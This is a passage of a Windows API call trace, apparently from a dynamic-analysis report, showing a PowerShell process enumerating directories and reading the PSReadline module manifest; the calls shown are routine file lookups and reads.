ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.522] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d6e0 | out: lpFindFileData=0xb156f8d6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0140.523] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d6e0 | out: lpFindFileData=0xb156f8d6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0140.523] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d940) returned 1 [0140.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d900) returned 1 [0140.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8da10) returned 1 [0140.523] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xb156f8d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0140.523] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0xb156f8d720 | out: lpFindFileData=0xb156f8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.523] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d6e0 | out: lpFindFileData=0xb156f8d6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.524] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d6e0 | out: lpFindFileData=0xb156f8d6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0140.524] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d6e0 | out: lpFindFileData=0xb156f8d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.524] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d940) returned 1 [0140.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d900) returned 1 [0140.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xb156f8d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0140.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8da20) returned 1 [0140.524] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en"), fInfoLevelId=0x0, lpFileInformation=0xb156f8db00 | out: lpFileInformation=0xb156f8db00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d9e0) returned 1 [0140.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8da70) returned 1 [0140.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xb156f8d550, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0140.524] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0xb156f8d780 | out: lpFindFileData=0xb156f8d780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.525] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d740 | out: lpFindFileData=0xb156f8d740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.525] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d740 | out: lpFindFileData=0xb156f8d740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0140.525] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d740 | out: lpFindFileData=0xb156f8d740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0140.525] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d9a0) returned 1 [0140.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d960) returned 1 [0140.525] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psd1")) returned 0xffffffff [0140.525] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psm1")) returned 0xffffffff [0140.525] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.cdxml")) returned 0xffffffff [0140.525] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.xaml")) returned 0xffffffff [0140.526] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.dll")) returned 0xffffffff [0140.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xb156f8d760, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0140.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dbb0) returned 1 [0140.526] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8dc90 | out: lpFileInformation=0xb156f8dc90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0140.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db70) returned 1 [0140.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dc00) returned 1 [0140.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xb156f8d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0140.526] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0xb156f8d910 | out: lpFindFileData=0xb156f8d910*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.526] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.526] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0140.526] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0140.527] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0140.527] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0140.527] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0140.527] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db30) returned 1 [0140.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8daf0) returned 1 [0140.527] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psd1")) returned 0xffffffff [0140.527] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psm1")) returned 0xffffffff [0140.527] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.cdxml")) returned 0xffffffff [0140.527] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.xaml")) returned 0xffffffff [0140.527] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.dll")) returned 0xffffffff [0140.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0140.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.528] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0140.528] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.528] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.528] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0140.528] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.528] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.529] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d960, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0140.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ddb0) returned 1 [0140.529] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de90 | out: lpFileInformation=0xb156f8de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0140.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd70) returned 1 [0140.529] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0140.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8db50) returned 1 [0140.529] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6fc [0140.529] GetFileType (hFile=0x6fc) returned 0x1 [0140.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dac0) returned 1 [0140.529] GetFileType (hFile=0x6fc) returned 0x1 [0140.530] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3393559f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3393559f0*, lpNumberOfBytesRead=0xb156f8dc28*=0x2e1, lpOverlapped=0x0) returned 1 [0140.531] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3393559f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3393559f0*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.531] CloseHandle (hObject=0x6fc) returned 1 [0140.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ded0) returned 1 [0140.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8de90) returned 1 [0140.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8df20) returned 1 [0140.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8de50) returned 1 [0140.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8de10) returned 1 [0140.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dec0) returned 1 [0140.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddf0) returned 1 [0140.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddb0) returned 1 [0140.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dec0) returned 1 [0140.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddf0) returned 1 [0140.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ddb0) returned 1 [0140.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, 